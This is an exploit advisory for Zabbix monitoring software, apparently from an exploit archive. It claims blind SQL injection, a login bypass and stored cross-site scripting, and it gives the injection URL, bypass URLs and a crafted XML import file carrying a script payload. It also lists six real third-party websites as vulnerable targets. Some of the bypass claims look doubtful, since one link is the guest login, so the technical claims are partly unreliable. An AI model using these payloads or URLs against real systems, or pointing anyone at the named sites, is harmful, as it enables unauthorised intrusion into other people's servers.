Zabbix 5.x SQL Injection / Cross Site Scripting

Zabbix versions 1.x through 5.x suffer from persistent cross site scripting and remote blind SQL injection vulnerabilities.


MD5 | 58a64992a12c020fdfb082f30b1cdfba

# Exploit Title: Zabbix all version  / Multiple Vulnerabilities
# Exploit Author: TaurusOmar
# Twitter:@TaurusOmar
# HomePage:taurusomar.com
# Date: Jul 23th, 2021
# CVSS: 3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:L
# Version: Zabbix [1.x, 2.x, 3.x, 4,x 5.x]
# Risk: High (9.0)
# Vendor Homepage: https://www.zabbix.com/
# Tested on: Arch Linux
# Greetz: PwnEc

# Software Description:
Zabbix is the ultimate enterprise-level software designed for real-time monitoring of millions of metrics collected from tens of thousands of servers, virtual machines and network devices.
With encryption support it is possible to secure communications between separate Zabbix components (such as Zabbix server, proxies, agents and command-line utilities) using Transport Layer
Security (TLS) protocol v.1.2. Certificate-based and pre-shared key-based encryption is supported. Encryption is optional and configurable for individual components.


# 1.) Vulnerability Description => Blind Sqli (affect all versions):
An error in the application allows executing sql statements blindly
Path: https://domain/zabbix/hostinventoriesoverview.php?sid=[RANDOM_TOKEN]+Blind_Sqli&form_refresh=1&groupid=0&groupby=alias


# 2.) Vulnerability Description => Bypass login (affect all versions):
An error in the security of the form allows the login page to be skipped directly to the administration panel, which allows an attacker to access the entire application,
managing to make queries, edit parameters, among others.

Path: http://domain/zabbix/index.php


Vulnerable Form:
<form method="post" action="index.php" accept-charset="utf-8" aria-label="Sign in">
<ul>
<li><label for="name">Username</label><input type="text" id="name" name="name" value="" maxlength="255" autofocus="autofocus"></li>
<li><label for="password">Password</label><input type="password" id="password" name="password" value="" maxlength="255"></li>
<li><input type="checkbox" id="autologin" name="autologin" value="1" class="checkbox-radio" checked="checked"><label for="autologin"><span></span>Remember me for 30 days</label></li>
<li><button type="submit" id="enter" name="enter" value="Sign in">Sign in</button></li>
<li class="sign-in-txt">or <a href="index.php?enter=guest">sign in as guest</a></li>
</ul>
</form>

Pocs Bypass login - access dashborad:
http://domain/zabbix/zabbix.php?action=dashboard.list
http://doamin/zabbix/zabbix.php?action=problem.view&ddreset=1
http://doamin/zabbix/overview.php?ddreset=1
http://doamin/zabbix/hostinventoriesoverview.php?ddreset=1
http://doamin/zabbix/screenconf.php


# 3.) Vulnerability Description => Stored Cross Site Scripting (affect all versions):
The application allows uploading an xml file which can be modified by the <name> parameter with a load util XSS

Path: https://domain//zabbix/screen.import.php?rules_preset=screen

Malicious File .xml

<?xml version="1.0" encoding="UTF-8"?>
<zabbix_export>
<version>3.4</version>
<date>2021-07-23T20:55:48Z</date>
<screens>
<screen>
<name>a‛%3E%3Cscript%3Ealert(‚123‛)%3C/script%3E</name>
<hsize>1</hsize>
<vsize>2</vsize>
<screen_items>
<screen_item>
<resourcetype>7</resourcetype>
<width>500</width>
<height>100</height>
<x>0</x>
<y>0</y>
<colspan>1</colspan>
<rowspan>1</rowspan>
<elements>0</elements>
<valign>0</valign>
<halign>0</halign>
<style>0</style>
<url/>
<dynamic>0</dynamic>
<sort_triggers>0</sort_triggers>
<resource>0</resource>
<max_columns>3</max_columns>
<application/>
</screen_item>
</screen_items>
</screen>
</screens>
</zabbix_export>


# 4.) Samples web Vulnerabilities whit diferent version:
https://monitoreouio.cntcloud.com/zabbix/[bypasslogin][blind_sqli][Stored_Xss]
https://monitoreogye.cntcloud.com/zabbix/[bypasslogin][blind_sqli][Stored_Xss]
https://zabbix.iwinds.com.ar/zabbix/[bypasslogin][blind_sqli][Stored_Xss]
https://www.cse.iitb.ac.in/soumen-pc/zabbix/[bypasslogin][blind_sqli][Stored_Xss]
http://monitor.esprida.com/zabbix/[bypasslogin][blind_sqli][Stored_Xss]
http://demo-zabbix.racom.eu/zabbix/[bypasslogin][blind_sqli][Stored_Xss]

#######
#
# Disclaimer:
# This or previous programs are for Educational purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the fact that Taurus Omar is not liable for any damages
# caused by direct or indirect use of the information or functionality provided by these programs.
# The author or any Internet provider bears NO responsibility for content or misuse of these programs
# or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss,
# system crash, system compromise, etc.) caused by the use of these programs are not Taurus Omar's
# responsibility.
#
#######

Related Posts